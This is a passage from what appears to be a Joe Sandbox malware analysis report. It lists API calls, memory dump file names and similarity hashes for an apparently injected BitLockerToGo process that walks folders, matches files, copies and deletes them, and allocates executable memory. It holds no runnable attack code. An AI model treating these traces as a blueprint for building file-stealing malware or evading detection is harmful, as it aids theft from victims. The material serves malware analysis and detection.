                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275B16A
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275B17E
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2500673778-0
                                                                                                                                                      • Opcode ID: 92ff4d0349f08ba1ce3ec15da1c04501e95255ddf055842875e7cb5f151fdf79
                                                                                                                                                      • Instruction ID: 09c6306d6c320e881879c6e40ad6544ac3e11abe809dda4c14279f4f05969a5c
                                                                                                                                                      • Opcode Fuzzy Hash: 92ff4d0349f08ba1ce3ec15da1c04501e95255ddf055842875e7cb5f151fdf79
                                                                                                                                                      • Instruction Fuzzy Hash: 20912B729101199BDF06EBA4DC9DEFE737AAF14300F504569E907B6090EF346A09CFA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275B42E
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275B442
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2500673778-0
                                                                                                                                                      • Opcode ID: 53a1f576b038d5d1df5a244db986c93c08d060d327b8f2b75fe6d2c8b9f697b2
                                                                                                                                                      • Instruction ID: 0462ed31224aeb6dc920b3177215c6f9c2753c2dd499ff21e724332a1a0ccfc4
                                                                                                                                                      • Opcode Fuzzy Hash: 53a1f576b038d5d1df5a244db986c93c08d060d327b8f2b75fe6d2c8b9f697b2
                                                                                                                                                      • Instruction Fuzzy Hash: 84710C729101199BDF06FBA4DDADEFE737AAF54300F504529E906B6190EF346A09CFA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 02768DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764BEA
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5218), ref: 02764C08
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 0276492C
                                                                                                                                                        • Part of subcall function 02764910: FindFirstFileA.KERNEL32(?,?), ref: 02764943
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,02770FDC), ref: 02764971
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,02770FE0), ref: 02764987
                                                                                                                                                        • Part of subcall function 02764910: FindNextFileA.KERNEL32(000000FF,?), ref: 02764B7D
                                                                                                                                                        • Part of subcall function 02764910: FindClose.KERNEL32(000000FF), ref: 02764B92
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 027649B0
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,027708D2), ref: 027649C5
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 027649E2
                                                                                                                                                        • Part of subcall function 02764910: PathMatchSpecA.SHLWAPI(?,?), ref: 02764A1E
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,029E4B48), ref: 02764A4A
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,02770FF8), ref: 02764A5C
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,?), ref: 02764A70
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,02770FFC), ref: 02764A82
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,?), ref: 02764A96
                                                                                                                                                        • Part of subcall function 02764910: CopyFileA.KERNEL32(?,?,00000001), ref: 02764AAC
                                                                                                                                                        • Part of subcall function 02764910: DeleteFileA.KERNEL32(?), ref: 02764B31
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 02764A07
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2104210347-0
                                                                                                                                                      • Opcode ID: c63ade9a1f6d75e0df309664c3b53976ab64515ec9dcd81c9731303376639316
                                                                                                                                                      • Instruction ID: d0c40b4dc9e19cf3a5df98359c918f4419b1557a601d0ce32ba1e2eda01aea20
                                                                                                                                                      • Opcode Fuzzy Hash: c63ade9a1f6d75e0df309664c3b53976ab64515ec9dcd81c9731303376639316
                                                                                                                                                      • Instruction Fuzzy Hash: 0541F6B79442046BDB55FBA4EC4AEFD733EE749300F408908B94A57144ED715BA88FE2
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNEL32(02756DBE,02756DBE,00003000,00000040), ref: 02756706
                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,02756DBE,00003000,00000040), ref: 02756753
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: 8a9b7eb1efcae79cd886dc5669396b42556e80ec6966f47ecb53ae172ff216a5
                                                                                                                                                      • Instruction ID: ec41fe701991a9a3bef697d0c439e7485f10a091c3a72d5b5a756d80b4aa94ce
                                                                                                                                                      • Opcode Fuzzy Hash: 8a9b7eb1efcae79cd886dc5669396b42556e80ec6966f47ecb53ae172ff216a5
                                                                                                                                                      • Instruction Fuzzy Hash: DB41E374A00209EFDB44CF98C494BADFBB5FF48314F5486A9E809AB341C771EA81CB84
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 02768DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0276508A
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E00), ref: 027650A8
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 0276492C
                                                                                                                                                        • Part of subcall function 02764910: FindFirstFileA.KERNEL32(?,?), ref: 02764943
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2699682494-0
                                                                                                                                                      • Opcode ID: 63f9a40d306d47b750f064b7cf13429a8f7ab3b8ef7cfb20c756a8c61e501cce
                                                                                                                                                      • Instruction ID: c0f5ee22bb1782d90c50893cd6619889c4b4d5071ca5e88e66e38e81cf99ebaa
                                                                                                                                                      • Opcode Fuzzy Hash: 63f9a40d306d47b750f064b7cf13429a8f7ab3b8ef7cfb20c756a8c61e501cce
                                                                                                                                                      • Instruction Fuzzy Hash: CC01967694421867CB65FB74DC4DEFE737DEB14300F004555BA4A56180EE709A988FE2
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0275114E,?,?,02766A1C), ref: 027510B3
                                                                                                                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0275114E,?,?,02766A1C), ref: 027510F7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Virtual$AllocFree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2087232378-0
                                                                                                                                                      • Opcode ID: 8f48bb74cdbc2fcb595a522b04ab28b09effa21fc8551e4893e36d5fee153989
                                                                                                                                                      • Instruction ID: 6e16ff9bb45d2884b11b6673639434989f3b7d10d4167c6eebe5653754c168aa
                                                                                                                                                      • Opcode Fuzzy Hash: 8f48bb74cdbc2fcb595a522b04ab28b09effa21fc8551e4893e36d5fee153989
                                                                                                                                                      • Instruction Fuzzy Hash: 67F0E971A81314BBE71496A89C5DFBAF7DCD705719F300844F908E3280D5715E00CA90
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02760117,?,00000000,?,00000000,02770DAB,02770DAA), ref: 02768D9F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: bc3d989f017d70d4bcd16ecb006a592d23656083811cb42f675594a25193e2d0
                                                                                                                                                      • Instruction ID: 1a5ac3e54cb787bab26d30ce130c92233f53c2e776bd78af8c36af65ea5fea83
                                                                                                                                                      • Opcode Fuzzy Hash: bc3d989f017d70d4bcd16ecb006a592d23656083811cb42f675594a25193e2d0
                                                                                                                                                      • Instruction Fuzzy Hash: E3F01574C00208EBCB00EFA5D54D6ECBB74EF14310F108199DC2667380DB755A59CF81
                                                                                                                                                      APIs
                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
